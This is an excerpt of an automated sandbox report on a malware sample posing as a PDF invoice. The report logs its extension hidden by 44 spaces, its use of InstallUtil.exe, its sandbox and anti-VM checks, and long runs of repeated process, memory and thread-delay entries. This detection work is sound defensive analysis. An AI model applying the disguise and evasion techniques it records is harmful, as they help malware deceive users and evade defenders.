                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeFile created: \fa_35_01_2025_sta_wz#u00f3r_standard_pdf .scr.exe
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeFile created: \fa_35_01_2025_sta_wz#u00f3r_standard_pdf .scr.exeJump to behavior

                Hooking and other Techniques for Hiding and Protection

                barindex
                Uses an obfuscated file name to hide its real file extension (a lot of spaces)
                Source: Detected 44 consecutive spaces in filenameStatic PE information: FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exe
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Yara detected AntiVM3
                Source: Yara matchFile source: Process Memory Space: FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exe PID: 2924, type: MEMORYSTR
                Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                Source: FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exe, 00000000.00000002.2208812518.0000000002C41000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeMemory allocated: D70000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeMemory allocated: 2C10000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeMemory allocated: 1130000 memory reserve | memory write watchJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: B30000 memory reserve | memory write watchJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 2700000 memory reserve | memory write watchJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 2470000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599891Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599766Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599641Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599531Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599422Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599313Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599188Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599063Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598953Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598844Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598719Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598609Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598500Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598391Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598281Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598172Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598063Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597938Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597828Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597719Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597594Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597484Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597375Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597266Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597156Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597046Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596932Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596813Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596631Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596375Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596250Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596141Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596031Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595922Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595813Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595691Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595563Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595438Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595328Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595219Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595094Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594985Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594860Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594735Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594610Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594485Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594360Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594235Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594110Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 593995Jump to behavior
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeWindow / User API: threadDelayed 6803Jump to behavior
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeWindow / User API: threadDelayed 629Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWindow / User API: threadDelayed 8783Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWindow / User API: threadDelayed 1059Jump to behavior
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exe TID: 6056Thread sleep time: -18446744073709540s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exe TID: 6056Thread sleep time: -100000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exe TID: 3572Thread sleep count: 6803 > 30Jump to behavior
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exe TID: 3572Thread sleep count: 629 > 30Jump to behavior
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exe TID: 6056Thread sleep time: -99875s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exe TID: 6056Thread sleep time: -99765s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exe TID: 6056Thread sleep time: -99640s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exe TID: 6056Thread sleep time: -99531s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exe TID: 6056Thread sleep time: -99421s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exe TID: 6056Thread sleep time: -99312s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exe TID: 6056Thread sleep time: -99187s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exe TID: 6056Thread sleep time: -99078s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exe TID: 6056Thread sleep time: -98968s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exe TID: 6056Thread sleep time: -98859s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exe TID: 6056Thread sleep time: -98750s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exe TID: 6056Thread sleep time: -98640s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exe TID: 6056Thread sleep time: -98531s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exe TID: 6056Thread sleep time: -98392s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exe TID: 6056Thread sleep time: -98274s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exe TID: 6056Thread sleep time: -98156s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exe TID: 6056Thread sleep time: -98046s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exe TID: 6056Thread sleep time: -97937s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exe TID: 6056Thread sleep time: -97828s >= -30000sJump to behavior
